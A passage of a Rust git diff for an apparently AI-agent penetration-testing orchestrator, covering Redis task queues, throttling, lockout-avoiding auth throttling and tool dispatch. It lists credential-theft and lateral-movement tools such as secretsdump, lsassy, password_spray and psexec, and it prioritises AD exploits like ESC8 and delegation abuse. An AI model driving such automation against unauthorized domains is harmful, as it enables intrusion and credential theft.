timeout_secs) + .await + .with_context(|| format!("BRPOP on {key}"))?; + + match result { + Some((_key, json)) => { + let tr: TaskResult = serde_json::from_str(&json) + .with_context(|| format!("Bad TaskResult JSON for {task_id}"))?; + Ok(Some(tr)) + } + None => Ok(None), + } + } + + /// Get the length of a role's task queue.
+ pub async fn queue_length(&self, role: &str) -> Result<usize> { + let key = Self::task_queue_key(role); + let mut conn = self.conn.clone(); + let len: usize = conn.llen(&key).await?; + Ok(len) + } + + /// Read heartbeat data for an agent. + pub async fn get_heartbeat(&self, agent: &str) -> Result<Option<HeartbeatData>> { + let key = Self::heartbeat_key(agent); + let mut conn = self.conn.clone(); + let data: Option<String> = conn.get(&key).await?; + match data { + Some(json) => { + let hb: HeartbeatData = serde_json::from_str(&json)?; + Ok(Some(hb)) + } + None => Ok(None), + } + } + + /// Write heartbeat for an agent (with TTL so stale entries self-expire). + pub async fn send_heartbeat( + &self, + agent: &str, + status: &str, + current_task: Option<&str>, + ttl: Duration, + ) -> Result<()> { + let key = Self::heartbeat_key(agent); + let hb = HeartbeatData { + agent: agent.to_string(), + status: status.to_string(), + timestamp: Utc::now().to_rfc3339(), + current_task: current_task.map(|s| s.to_string()), + pod_name: std::env::var("POD_NAME").ok(), + }; + let json = serde_json::to_string(&hb)?; + let mut conn = self.conn.clone(); + conn.set_ex::<_, _, ()>(&key, &json, ttl.as_secs()) + .await + .with_context(|| format!("SET EX heartbeat for {agent}"))?; + debug!(agent, status, "Heartbeat sent"); + Ok(()) + } + + /// Publish a state-update notification on the PubSub channel. + pub async fn publish_state_update(&self, operation_id: &str) -> Result<()> { + let channel = format!("{STATE_UPDATE_CHANNEL_PREFIX}:{operation_id}"); + let mut conn = self.conn.clone(); + conn.publish::<_, _, ()>(&channel, "updated") + .await + .with_context(|| format!("PUBLISH to {channel}"))?; + debug!(operation_id, "State update published"); + Ok(()) + } + + // === Operation lock ===================================================== + + /// Try to acquire the operation lock. Returns true if acquired. + pub async fn try_acquire_lock(&self, operation_id: &str, ttl: Duration) -> Result<bool> { + let key = format!("{LOCK_PREFIX}:{operation_id}"); + let holder = format!( + "orchestrator-{}", + std::env::var("POD_NAME").unwrap_or_else(|_| Uuid::new_v4().to_string()) + ); + let mut conn = self.conn.clone(); + let acquired: bool = redis::cmd("SET") + .arg(&key) + .arg(&holder) + .arg("NX") + .arg("EX") + .arg(ttl.as_secs()) + .query_async(&mut conn) + .await + .with_context(|| format!("SET NX lock for operation {operation_id}"))?; + if acquired { + info!(operation_id, "Operation lock acquired"); + } + Ok(acquired) + } + + /// Extend the operation lock TTL. Call periodically to keep it alive. + pub async fn extend_lock(&self, operation_id: &str, ttl: Duration) -> Result<bool> { + let key = format!("{LOCK_PREFIX}:{operation_id}"); + let mut conn = self.conn.clone(); + let ok: bool = conn.expire(&key, ttl.as_secs() as i64).await?; + if !ok { + warn!(operation_id, "Lock key missing — could not extend TTL"); + } + Ok(ok) + } + + // === Task status tracking =============================================== + + /// Set the status string for a task (with 24h TTL). + /// + /// If a record already exists for this task, preserves existing fields + /// (operation_id, role, task_type, started_at, payload) and updates + /// only the status and timestamps.
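+    ///
+    /// Illustrative status record after completion (timestamps elided):
+    /// ```json
+    /// {"task_id": "recon_ab12cd34ef56", "status": "completed",
+    ///  "started_at": "...", "updated_at": "...", "ended_at": "..."}
+    /// ```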
+ pub async fn set_task_status(&self, task_id: &str, status: &str) -> Result<()> { + let key = Self::task_status_key(task_id); + let mut conn = self.conn.clone(); + + // Read-modify-write: preserve existing fields + let existing: Option<String> = match conn.get::<_, Option<String>>(&key).await { + Ok(v) => v, + Err(e) => { + warn!(task_id = task_id, err = %e, "Failed to read existing task status"); + None + } + }; + let mut payload: serde_json::Value = existing + .and_then(|s| serde_json::from_str(&s).ok()) + .unwrap_or_else(|| serde_json::json!({})); + + let now = Utc::now().to_rfc3339(); + payload["task_id"] = serde_json::json!(task_id); + payload["status"] = serde_json::json!(status); + payload["updated_at"] = serde_json::json!(now); + + if status == "in_progress" && payload.get("started_at").is_none() { + payload["started_at"] = serde_json::json!(now); + } + if status == "completed" || status == "failed" { + payload["ended_at"] = serde_json::json!(now); + } + + let json = payload.to_string(); + conn.set_ex::<_, _, ()>(&key, &json, TASK_STATUS_TTL_SECS) + .await?; + Ok(()) + } + + /// Write a full task status record with all metadata. + pub async fn set_task_status_full( + &self, + task_id: &str, + status: &str, + operation_id: &str, + role: &str, + task_type: &str, + payload: Option<&serde_json::Value>, + ) -> Result<()> { + let key = Self::task_status_key(task_id); + let now = Utc::now().to_rfc3339(); + let mut record = serde_json::json!({ + "task_id": task_id, + "status": status, + "operation_id": operation_id, + "role": role, + "task_type": task_type, + "updated_at": now, + }); + if status == "in_progress" { + record["started_at"] = serde_json::json!(now); + } + if let Some(p) = payload { + record["payload"] = p.clone(); + } + let json = record.to_string(); + let mut conn = self.conn.clone(); + conn.set_ex::<_, _, ()>(&key, &json, TASK_STATUS_TTL_SECS) + .await?; + Ok(()) + } + + /// Read task status. + pub async fn get_task_status(&self, task_id: &str) -> Result<Option<String>> { + let key = Self::task_status_key(task_id); + let mut conn = self.conn.clone(); + let data: Option<String> = conn.get(&key).await?; + Ok(data) + } + + /// Get a clone of the underlying connection manager. + /// + /// Used by the deferred queue to run ZSET commands directly. + pub fn connection(&self) -> ConnectionManager { + self.conn.clone() + } + + /// Send a result to the task's result queue (worker side). + pub async fn send_result(&self, task_id: &str, result: &TaskResult) -> Result<()> { + let key = Self::result_queue_key(task_id); + let json = serde_json::to_string(result)?; + let mut conn = self.conn.clone(); + conn.lpush::<_, _, ()>(&key, &json).await?; + conn.expire::<_, ()>(&key, RESULT_TTL_SECS as i64).await?; + let final_status = if result.success { + "completed" + } else { + "failed" + }; + debug!( + task_id = task_id, + status = final_status, + "Updating task status after send_result" + ); + self.set_task_status(task_id, final_status).await?; + debug!(task_id = task_id, "Task status updated to {}", final_status); + Ok(()) + } +} diff --git a/ares-cli/src/orchestrator/throttling.rs b/ares-cli/src/orchestrator/throttling.rs new file mode 100644 index 00000000..901a9834 --- /dev/null +++ b/ares-cli/src/orchestrator/throttling.rs @@ -0,0 +1,440 @@ +//! Rate limiting and concurrency control. +//! +//! Mirrors the Python `ares.core.dispatcher.throttling.ThrottlingMixin`. +//! +//! Three layers of throttling: +//! 1. **Per-role semaphores** — limits how many tasks one role can have in-flight. +//! 2.
**Global LLM concurrency** — soft cap + 1.5x hard cap before deferring. +//! 3. **Dispatch delay** — minimum interval between consecutive submissions. + +use std::collections::HashMap; +use std::sync::Arc; +use std::time::Instant; + +use tokio::sync::Semaphore; +use tracing::{debug, info, warn}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::routing::ActiveTaskTracker; + +// --------------------------------------------------------------------------- +// Critical-path classification (matches Python ThrottlingMixin constants) +// --------------------------------------------------------------------------- + +/// Task types that bypass hard-cap throttling (DA-critical path). +const CRITICAL_PATH_TASK_TYPES: &[&str] = &["exploit"]; + +/// High-value exploit subtypes that bypass hard cap. +const CRITICAL_PATH_VULN_TYPES: &[&str] = &[ + "constrained_delegation", + "unconstrained_delegation", + "esc1", + "esc4", + "esc8", + "krbtgt_hash", + "adcs_esc1", + "adcs_esc4", + "adcs_esc8", +]; + +/// Maximum tasks allowed to bypass the hard cap simultaneously. +const MAX_BYPASS_TASKS: usize = 3; + +// --------------------------------------------------------------------------- +// ThrottleDecision +// --------------------------------------------------------------------------- + +/// What the throttler decided about a candidate task. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum ThrottleDecision { + /// Submit immediately. + Allow, + /// Defer to the deferred queue. + Defer, + /// Wait for `duration` then re-check. + Wait(std::time::Duration), +} + +// --------------------------------------------------------------------------- +// Throttler +// --------------------------------------------------------------------------- + +/// Concurrency controller that mirrors the Python throttling logic. +#[allow(dead_code)] +pub struct Throttler { + config: Arc<OrchestratorConfig>, + tracker: ActiveTaskTracker, + /// Per-role semaphores (lazily populated). + role_semaphores: tokio::sync::Mutex<HashMap<String, Arc<Semaphore>>>, + /// Timestamp of the last successful dispatch. + last_dispatch: tokio::sync::Mutex<Instant>, + /// Accumulated rate-limit errors (from worker feedback). + rate_limit_errors: tokio::sync::Mutex<u32>, + /// Global backoff deadline (if any). + backoff_until: tokio::sync::Mutex<Option<Instant>>, +} + +impl Throttler { + pub fn new(config: Arc<OrchestratorConfig>, tracker: ActiveTaskTracker) -> Self { + Self { + config, + tracker, + role_semaphores: tokio::sync::Mutex::new(HashMap::new()), + last_dispatch: tokio::sync::Mutex::new(Instant::now()), + rate_limit_errors: tokio::sync::Mutex::new(0), + backoff_until: tokio::sync::Mutex::new(None), + } + } + + /// Evaluate whether `task_type` targeting `role` should be allowed now. + pub async fn check( + &self, + task_type: &str, + target_role: &str, + payload: Option<&serde_json::Value>, + ) -> ThrottleDecision { + // Non-LLM tasks (crack, command) always pass.
+ if crate::orchestrator::routing::is_non_llm_task(task_type) { + return ThrottleDecision::Allow; + } + + { + let backoff = self.backoff_until.lock().await; + if let Some(deadline) = *backoff { + if Instant::now() < deadline { + let remaining = deadline - Instant::now(); + return ThrottleDecision::Wait(remaining); + } + } + } + + let llm_count = self.tracker.llm_task_count().await; + let max_tasks = self.config.max_concurrent_tasks; + let hard_cap = self.config.hard_cap(); + + // --- HARD CAP (1.5x) --- + if llm_count >= hard_cap { + if self.is_critical_path(task_type, payload) { + let bypass_count = llm_count.saturating_sub(hard_cap); + if bypass_count >= MAX_BYPASS_TASKS { + warn!( + llm_count, + hard_cap, + bypass_count, + task_type, + "Hard cap: too many bypass tasks, deferring" + ); + return ThrottleDecision::Defer; + } + info!( + llm_count, + hard_cap, + bypass = bypass_count + 1, + task_type, + "Hard cap: allowing critical-path task" + ); + return ThrottleDecision::Allow; + } + + debug!(llm_count, hard_cap, task_type, "Hard cap: deferring task"); + return ThrottleDecision::Defer; + } + + // --- SOFT CAP --- + if llm_count >= max_tasks { + let role_count = self.tracker.count_for_role(target_role).await; + let min_per_role = 1_usize; // matches get_min_slots_per_role default + if role_count < min_per_role { + info!( + llm_count, + max_tasks, + role = target_role, + role_count, + "Soft cap: allowing — role below minimum" + ); + return ThrottleDecision::Allow; + } + debug!(llm_count, max_tasks, task_type, "Soft cap: deferring task"); + return ThrottleDecision::Defer; + } + + // --- Dispatch delay --- + { + let last = self.last_dispatch.lock().await; + let elapsed = last.elapsed(); + if elapsed < self.config.dispatch_delay { + let wait = self.config.dispatch_delay - elapsed; + return ThrottleDecision::Wait(wait); + } + } + + ThrottleDecision::Allow + } + + /// Record that a dispatch happened (updates the last-dispatch timestamp). + pub async fn record_dispatch(&self) { + let mut last = self.last_dispatch.lock().await; + *last = Instant::now(); + } + + /// Record a rate-limit error from a worker. If enough accumulate, trigger + /// a global backoff. + pub async fn record_rate_limit_error(&self) { + let mut errors = self.rate_limit_errors.lock().await; + *errors += 1; + let threshold = 3_u32; // matches Python get_rate_limit_threshold default + if *errors >= threshold { + let backoff_secs = 30_u64; // matches Python get_rate_limit_backoff default + let mut bo = self.backoff_until.lock().await; + *bo = Some(Instant::now() + std::time::Duration::from_secs(backoff_secs)); + warn!( + errors = *errors, + backoff_secs, "Rate limit threshold reached — applying global backoff" + ); + *errors = 0; + } + } + + /// Clear one rate-limit error (call on successful task completion). + pub async fn clear_rate_limit_error(&self) { + let mut errors = self.rate_limit_errors.lock().await; + *errors = errors.saturating_sub(1); + } + + /// Acquire a per-role semaphore permit. Returns a guard that releases on drop. 
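+    ///
+    /// A usage sketch — the permit is released when the guard is dropped:
+    /// ```ignore
+    /// if let Some(_permit) = throttler.acquire_role_permit("recon").await {
+    ///     // dispatch one recon task while holding the permit
+    /// } // permit released here
+    /// ```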
+ #[allow(dead_code)] + pub async fn acquire_role_permit( + &self, + role: &str, + ) -> Option<tokio::sync::OwnedSemaphorePermit> { + let sem = { + let mut sems = self.role_semaphores.lock().await; + sems.entry(role.to_string()) + .or_insert_with(|| Arc::new(Semaphore::new(self.config.max_tasks_per_role))) + .clone() + }; + sem.try_acquire_owned().ok() + } + + // --- internal --- + + fn is_critical_path(&self, task_type: &str, payload: Option<&serde_json::Value>) -> bool { + // Check exploit + vuln_type + if CRITICAL_PATH_TASK_TYPES.contains(&task_type) { + if let Some(p) = payload { + let vt = p + .get("vuln_type") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_lowercase(); + if CRITICAL_PATH_VULN_TYPES.contains(&vt.as_str()) { + return true; + } + } + } + + // Check delegation enumeration + if task_type == "privesc_enumeration" { + if let Some(techniques) = payload + .and_then(|p| p.get("techniques")) + .and_then(|v| v.as_array()) + { + if techniques.iter().any(|t| { + t.as_str() + .map(|s| s.to_lowercase().contains("delegation")) + .unwrap_or(false) + }) { + return true; + } + } + } + + // Check ESC8 coercion + if task_type == "coercion" { + if let Some(techniques) = payload + .and_then(|p| p.get("techniques")) + .and_then(|v| v.as_array()) + { + let esc8_techniques = ["ntlmrelayx_to_adcs", "petitpotam"]; + if techniques.iter().any(|t| { + t.as_str() + .map(|s| esc8_techniques.contains(&s.to_lowercase().as_str())) + .unwrap_or(false) + }) { + return true; + } + } + } + + false + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::routing::{ActiveTask, ActiveTaskTracker}; + use serde_json::json; + + fn make_throttler(max_tasks: usize) -> (Throttler, ActiveTaskTracker) { + let config = Arc::new(crate::orchestrator::config::OrchestratorConfig { + redis_url: "redis://localhost".into(), + operation_id: "test-op".into(), + max_concurrent_tasks: max_tasks, + heartbeat_interval: std::time::Duration::from_secs(30), + heartbeat_timeout: std::time::Duration::from_secs(120), + result_poll_interval: std::time::Duration::from_millis(500), + lock_ttl: std::time::Duration::from_secs(300), + deferred_poll_interval: std::time::Duration::from_secs(10), + max_tasks_per_role: 3, + dispatch_delay: std::time::Duration::from_millis(0), + stale_task_timeout: std::time::Duration::from_secs(300), + deferred_task_max_age: std::time::Duration::from_secs(300), + max_deferred_per_type: 5, + max_deferred_total: 20, + target_domain: String::new(), + target_ips: Vec::new(), + initial_credential: None, + }); + let tracker = ActiveTaskTracker::new(); + (Throttler::new(config, tracker.clone()), tracker) + } + + #[tokio::test] + async fn non_llm_always_allowed() { + let (t, _) = make_throttler(1); + assert_eq!( + t.check("crack", "cracker", None).await, + ThrottleDecision::Allow + ); + assert_eq!( + t.check("command", "lateral", None).await, + ThrottleDecision::Allow + ); + } + + #[tokio::test] + async fn under_soft_cap_allows() { + let (t, _) = make_throttler(8); + assert_eq!( + t.check("recon", "recon", None).await, + ThrottleDecision::Allow + ); + } + + #[tokio::test] + async fn hard_cap_defers_non_critical() { + let (t, tracker) = make_throttler(2); // soft=2, hard=3 + for i in 0..3 { + tracker + .add(ActiveTask { + task_id: format!("t{i}"), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: Instant::now(), + }) + .await; + } + assert_eq!( + t.check("recon", "recon", None).await, + ThrottleDecision::Defer + ); + } + + #[tokio::test] + async fn critical_path_bypasses_hard_cap() { + let (t, tracker) =
make_throttler(2); + for i in 0..3 { + tracker + .add(ActiveTask { + task_id: format!("t{i}"), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: Instant::now(), + }) + .await; + } + let payload = json!({"vuln_type": "constrained_delegation"}); + assert_eq!( + t.check("exploit", "privesc", Some(&payload)).await, + ThrottleDecision::Allow + ); + } + + #[tokio::test] + async fn critical_path_delegation_enum() { + let (t, tracker) = make_throttler(2); + for i in 0..3 { + tracker + .add(ActiveTask { + task_id: format!("t{i}"), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: Instant::now(), + }) + .await; + } + let payload = json!({"techniques": ["find_delegation"]}); + assert_eq!( + t.check("privesc_enumeration", "privesc", Some(&payload)) + .await, + ThrottleDecision::Allow + ); + } + + #[tokio::test] + async fn critical_path_esc8_coercion() { + let (t, tracker) = make_throttler(2); + for i in 0..3 { + tracker + .add(ActiveTask { + task_id: format!("t{i}"), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: Instant::now(), + }) + .await; + } + let payload = json!({"techniques": ["petitpotam"]}); + assert_eq!( + t.check("coercion", "coercion", Some(&payload)).await, + ThrottleDecision::Allow + ); + } + + #[tokio::test] + async fn rate_limit_triggers_backoff() { + let (t, _) = make_throttler(8); + t.record_rate_limit_error().await; + t.record_rate_limit_error().await; + t.record_rate_limit_error().await; // threshold=3 + assert!(matches!( + t.check("recon", "recon", None).await, + ThrottleDecision::Wait(_) + )); + } + + #[tokio::test] + async fn clear_error_prevents_backoff() { + let (t, _) = make_throttler(8); + t.record_rate_limit_error().await; + t.record_rate_limit_error().await; + t.clear_rate_limit_error().await; // back to 1 + t.record_rate_limit_error().await; // now 2 + assert_eq!( + t.check("recon", "recon", None).await, + ThrottleDecision::Allow + ); + } + + #[tokio::test] + async fn role_semaphore_limits() { + let (t, _) = make_throttler(8); + let _p1 = t.acquire_role_permit("recon").await; + let _p2 = t.acquire_role_permit("recon").await; + let _p3 = t.acquire_role_permit("recon").await; + assert!(_p1.is_some() && _p2.is_some() && _p3.is_some()); + assert!(t.acquire_role_permit("recon").await.is_none()); + assert!(t.acquire_role_permit("lateral").await.is_some()); + } +} diff --git a/ares-cli/src/orchestrator/tool_dispatcher/auth_throttle.rs b/ares-cli/src/orchestrator/tool_dispatcher/auth_throttle.rs new file mode 100644 index 00000000..c6ae3023 --- /dev/null +++ b/ares-cli/src/orchestrator/tool_dispatcher/auth_throttle.rs @@ -0,0 +1,88 @@ +//! Per-credential auth throttle to prevent AD account lockout. + +use std::sync::Arc; +use std::time::{Duration, Instant}; + +use tokio::sync::Mutex; +use tracing::debug; + +/// Per-credential auth attempt tracker. +/// +/// Tracks timestamps of auth-bearing tool dispatches keyed by `user@domain`. +/// Before dispatching, callers must call `acquire()` which sleeps if the +/// credential has been used too many times within the observation window. +/// +/// Default policy: max 3 auth attempts per credential per 60-second window. +/// This stays well under the typical AD lockout threshold (5 in 5 min). +#[derive(Clone)] +pub struct AuthThrottle { + pub(super) inner: Arc<Mutex<AuthThrottleInner>>, +} + +pub(super) struct AuthThrottleInner { + /// `credential_key` → Vec of timestamps + pub(super) attempts: std::collections::HashMap<String, Vec<Instant>>, + /// Max auth attempts per credential within the observation window.
+ pub(super) max_attempts: usize, + /// Observation window for rate limiting. + pub(super) window: Duration, +} + +impl AuthThrottle { + pub fn new(max_attempts: usize, window: Duration) -> Self { + Self { + inner: Arc::new(Mutex::new(AuthThrottleInner { + attempts: std::collections::HashMap::new(), + max_attempts, + window, + })), + } + } + + /// Acquire permission to dispatch an auth-bearing tool call. + /// Sleeps if the credential has hit the rate limit within the window. + pub async fn acquire(&self, credential_key: &str) { + loop { + let sleep_dur = { + let mut inner = self.inner.lock().await; + let now = Instant::now(); + let max_attempts = inner.max_attempts; + let window = inner.window; + + let timestamps = inner + .attempts + .entry(credential_key.to_string()) + .or_default(); + + // Prune expired entries + timestamps.retain(|t| now.duration_since(*t) < window); + + if timestamps.len() < max_attempts { + // Under the limit — record this attempt and proceed + timestamps.push(now); + return; + } + + // Over the limit — calculate how long to wait until the oldest + // attempt falls outside the window + let oldest = timestamps[0]; + let elapsed = now.duration_since(oldest); + if elapsed >= window { + // Edge case: already expired, prune and retry + timestamps.remove(0); + timestamps.push(now); + return; + } + + window - elapsed + Duration::from_millis(100) + }; + + debug!( + credential = credential_key, + wait_secs = sleep_dur.as_secs_f32(), + "Auth throttle: delaying tool dispatch to avoid account lockout" + ); + tokio::time::sleep(sleep_dur).await; + } + } +} diff --git a/ares-cli/src/orchestrator/tool_dispatcher/local.rs b/ares-cli/src/orchestrator/tool_dispatcher/local.rs new file mode 100644 index 00000000..ef5e9505 --- /dev/null +++ b/ares-cli/src/orchestrator/tool_dispatcher/local.rs @@ -0,0 +1,91 @@ +//! In-process tool dispatcher (no Redis). + +use anyhow::Result; +use tracing::debug; + +use ares_llm::{ToolCall, ToolExecResult}; + +use crate::orchestrator::task_queue::TaskQueue; + +use super::{extract_credential_key, push_realtime_discoveries, AuthThrottle}; + +/// Dispatches tool calls directly via `ares_tools::dispatch` without Redis. +/// +/// Useful for testing, single-binary deployments, or when workers are +/// colocated in the same process as the orchestrator. 
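+///
+/// A wiring sketch (assumes an existing `TaskQueue` and operation ID):
+/// ```ignore
+/// let throttle = AuthThrottle::new(3, std::time::Duration::from_secs(60));
+/// let dispatcher = LocalToolDispatcher::new(queue.clone(), operation_id.clone(), throttle);
+/// ```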
+pub struct LocalToolDispatcher { + pub(super) queue: TaskQueue, + pub(super) operation_id: String, + pub(super) auth_throttle: AuthThrottle, +} + +impl LocalToolDispatcher { + pub fn new(queue: TaskQueue, operation_id: String, auth_throttle: AuthThrottle) -> Self { + Self { + queue, + operation_id, + auth_throttle, + } + } +} + +#[async_trait::async_trait] +impl ares_llm::ToolDispatcher for LocalToolDispatcher { + async fn dispatch_tool( + &self, + _role: &str, + _task_id: &str, + call: &ToolCall, + ) -> Result<ToolExecResult> { + // Rate-limit auth-bearing tools to prevent AD account lockout + if let Some(cred_key) = extract_credential_key(call) { + self.auth_throttle.acquire(&cred_key).await; + } + + debug!(tool = %call.name, "Executing tool locally"); + + match ares_tools::dispatch(&call.name, &call.arguments).await { + Ok(output) => { + let raw = output.combined_raw(); + let combined = output.combined(); + let error = if output.success { + None + } else { + Some(format!("tool exited with code {:?}", output.exit_code)) + }; + + // Parse structured discoveries from raw (unfiltered) output + let discoveries = + ares_tools::parsers::parse_tool_output(&call.name, &raw, &call.arguments); + let discoveries = if discoveries.as_object().is_none_or(|o| o.is_empty()) { + None + } else { + Some(discoveries) + }; + + // Push discoveries to real-time list immediately (like RedisToolDispatcher) + if let Some(ref disc) = discoveries { + push_realtime_discoveries( + &self.queue, + &self.operation_id, + disc, + &call.name, + &call.arguments, + ) + .await; + } + + Ok(ToolExecResult { + output: combined, + error, + discoveries, + }) + } + Err(e) => Ok(ToolExecResult { + output: String::new(), + error: Some(e.to_string()), + discoveries: None, + }), + } + } +} diff --git a/ares-cli/src/orchestrator/tool_dispatcher/mod.rs b/ares-cli/src/orchestrator/tool_dispatcher/mod.rs new file mode 100644 index 00000000..6384bd5b --- /dev/null +++ b/ares-cli/src/orchestrator/tool_dispatcher/mod.rs @@ -0,0 +1,228 @@ +//! Redis-backed tool dispatcher for the LLM agent loop. +//! +//! Implements `ares_llm::ToolDispatcher` by pushing individual tool calls +//! to a Redis queue (`ares:tool_exec:{role}`) and waiting for results +//! on a per-call mailbox (`ares:tool_results:{call_id}`). +//! +//! Rust workers run a tool executor that BRPOPs from `tool_exec`, +//! invokes the tool via `ares_tools::dispatch`, and LPUSHes the result. +//! +//! Also provides [`LocalToolDispatcher`] for in-process execution without +//! going through Redis, useful for testing or single-binary deployments. + +use redis::AsyncCommands; +use serde::{Deserialize, Serialize}; +use tracing::debug; + +use crate::orchestrator::state::DISCOVERY_KEY_PREFIX; +use crate::orchestrator::task_queue::TaskQueue; + +mod auth_throttle; +mod local; +mod redis_dispatcher; +#[cfg(test)] +mod tests; + +pub use auth_throttle::AuthThrottle; +pub use local::LocalToolDispatcher; +pub use redis_dispatcher::RedisToolDispatcher; + +// --------------------------------------------------------------------------- +// Wire format +// --------------------------------------------------------------------------- + +/// Message pushed to the tool execution queue. +#[derive(Debug, Serialize, Deserialize)] +pub struct ToolExecRequest { + pub call_id: String, + pub task_id: String, + pub tool_name: String, + pub arguments: serde_json::Value, + /// W3C traceparent header for cross-service span linking.
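+    /// Example value (the W3C spec's sample): `00-4bf92f3577b34da6a3ce929d0e0e4736-00f067aa0ba902b7-01`.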
+ #[serde(skip_serializing_if = "Option::is_none", default)] + pub traceparent: Option<String>, + /// Operation ID for span correlation with dashboards. + #[serde(skip_serializing_if = "Option::is_none", default)] + pub operation_id: Option<String>, +} + +/// Message returned by the worker on the result mailbox. +#[derive(Debug, Serialize, Deserialize)] +pub struct ToolExecResponse { + pub call_id: String, + pub output: String, + pub error: Option<String>, + /// Structured discoveries parsed by the worker from tool output. + #[serde(default)] + pub discoveries: Option<serde_json::Value>, +} + +// --------------------------------------------------------------------------- +// Constants +// --------------------------------------------------------------------------- + +/// Prefix for tool execution request queues. +pub(super) const TOOL_EXEC_PREFIX: &str = "ares:tool_exec"; + +/// Prefix for per-call result mailboxes. +pub(super) const TOOL_RESULT_PREFIX: &str = "ares:tool_results"; + +/// TTL for result keys (1 hour). +pub(super) const RESULT_TTL_SECS: u64 = 3600; + +/// Default timeout waiting for a tool result (25 minutes). +/// Must exceed queue wait time + longest tool runtime (hashcat can queue +/// behind another hashcat, so 2x runtime + buffer). +pub(super) const DEFAULT_TOOL_TIMEOUT_SECS: u64 = 1500; + +// --------------------------------------------------------------------------- +// Dispatcher helpers +// --------------------------------------------------------------------------- + +/// Tools that require netexec/ldapsearch and must be routed to the recon +/// worker queue regardless of the calling agent's role. +const RECON_ROUTED_TOOLS: &[&str] = &[ + "ldap_search_descriptions", + "password_spray", + "username_as_password", + "gpp_password_finder", + "sysvol_script_search", + "password_policy", + "laps_dump", + "smbclient_spider", + "check_credman_entries", + "check_autologon_registry", + "domain_admin_checker", + "gmsa_dump_passwords", +]; + +/// Tools that authenticate against AD targets. Tool calls with these names +/// are subject to per-credential rate limiting to avoid account lockout. +const AUTH_BEARING_TOOLS: &[&str] = &[ + // netexec tools (each invocation is a separate SMB/LDAP auth) + "ldap_search_descriptions", + "password_spray", + "username_as_password", + "gpp_password_finder", + "sysvol_script_search", + "password_policy", + "laps_dump", + "smbclient_spider", + "check_credman_entries", + "check_autologon_registry", + "domain_admin_checker", + "gmsa_dump_passwords", + // impacket tools + "secretsdump", + "secretsdump_kerberos", + "kerberoast", + "asrep_roast", + "lsassy", + "ntds_dit_extract", + // lateral tools (auth per target) + "smbexec", + "psexec", + "wmiexec", + "dcomexec", + "atexec", + "smbclient_kerberos_shares", +]; + +/// Extract a credential key from tool call arguments for rate limiting. +/// Returns `Some("user@domain")` if the tool authenticates with credentials. +pub(super) fn extract_credential_key(call: &ares_llm::ToolCall) -> Option<String> { + if !AUTH_BEARING_TOOLS.contains(&call.name.as_str()) { + return None; + } + let username = call.arguments.get("username").and_then(|v| v.as_str())?; + let domain = call + .arguments + .get("domain") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty()) + .unwrap_or("unknown"); + Some(format!( + "{}@{}", + username.to_lowercase(), + domain.to_lowercase() + )) +} + +/// Resolve the actual worker queue for a tool call. +/// +/// Most tools go to the calling agent's role queue.
+/// are cross-routed to the `recon` queue where the binary exists.
+pub(super) fn resolve_queue_role<'a>(role: &'a str, tool_name: &str) -> &'a str {
+    if role != "recon" && RECON_ROUTED_TOOLS.contains(&tool_name) {
+        "recon"
+    } else {
+        role
+    }
+}
+
+/// Push structured discoveries from a tool result to the real-time
+/// discovery list so the discovery poller publishes them to state.
+///
+/// `tool_args` carries the tool call's input arguments — used to extract
+/// the authenticating credential (username/domain) for lineage tracking.
+pub(super) async fn push_realtime_discoveries(
+    queue: &TaskQueue,
+    operation_id: &str,
+    discoveries: &serde_json::Value,
+    tool_name: &str,
+    tool_args: &serde_json::Value,
+) {
+    let discovery_key = format!("{DISCOVERY_KEY_PREFIX}:{operation_id}");
+    let mut conn = queue.connection();
+
+    // Extract input credential context for lineage tracking
+    let input_username = tool_args
+        .get("username")
+        .or_else(|| tool_args.get("user"))
+        .and_then(|v| v.as_str())
+        .unwrap_or("");
+    let input_domain = tool_args
+        .get("domain")
+        .and_then(|v| v.as_str())
+        .unwrap_or("");
+
+    // Push each discovery type as individual entries
+    let type_map: &[(&str, &str)] = &[
+        ("hosts", "host"),
+        ("credentials", "credential"),
+        ("hashes", "hash"),
+        ("vulnerabilities", "vulnerability"),
+        ("shares", "share"),
+        ("discovered_users", "user"),
+    ];
+
+    let mut pushed = 0usize;
+    for &(key, disc_type) in type_map {
+        if let Some(items) = discoveries.get(key).and_then(|v| v.as_array()) {
+            for item in items {
+                let mut entry = serde_json::json!({
+                    "type": disc_type,
+                    "data": item,
+                    "source_tool": tool_name,
+                });
+                // Attach input credential context for lineage resolution
+                if !input_username.is_empty() {
+                    entry["input_username"] = serde_json::Value::String(input_username.to_string());
+                    entry["input_domain"] = serde_json::Value::String(input_domain.to_string());
+                }
+                if let Ok(json) = serde_json::to_string(&entry) {
+                    let _: anyhow::Result<(), _> = conn.lpush(&discovery_key, &json).await;
+                    pushed += 1;
+                }
+            }
+        }
+    }
+
+    if pushed > 0 {
+        debug!(
+            count = pushed,
+            tool = tool_name,
+            "Pushed real-time discoveries"
+        );
+    }
+}
diff --git a/ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs b/ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs
new file mode 100644
index 00000000..5ef564bf
--- /dev/null
+++ b/ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs
@@ -0,0 +1,165 @@
+//! Redis-backed tool dispatcher.
+
+use anyhow::{Context, Result};
+use redis::AsyncCommands;
+use tracing::{debug, warn, Instrument};
+
+use ares_core::telemetry::propagation::inject_traceparent;
+use ares_core::telemetry::spans::{producer_span, Team};
+use ares_llm::{ToolCall, ToolExecResult};
+
+use crate::orchestrator::task_queue::TaskQueue;
+
+use super::{
+    extract_credential_key, push_realtime_discoveries, AuthThrottle, ToolExecRequest,
+    ToolExecResponse, RESULT_TTL_SECS, TOOL_EXEC_PREFIX, TOOL_RESULT_PREFIX,
+};
+
+/// Dispatches tool calls to workers via Redis queues.
+///
+/// When tool results contain structured discoveries (hosts, credentials, etc.),
+/// they are pushed to the `ares:discoveries:{op_id}` list for real-time
+/// processing by the discovery poller — ensuring discoveries reach state
+/// immediately rather than waiting for the task result consumer.
+pub struct RedisToolDispatcher {
+    pub(super) queue: TaskQueue,
+    pub(super) tool_timeout: std::time::Duration,
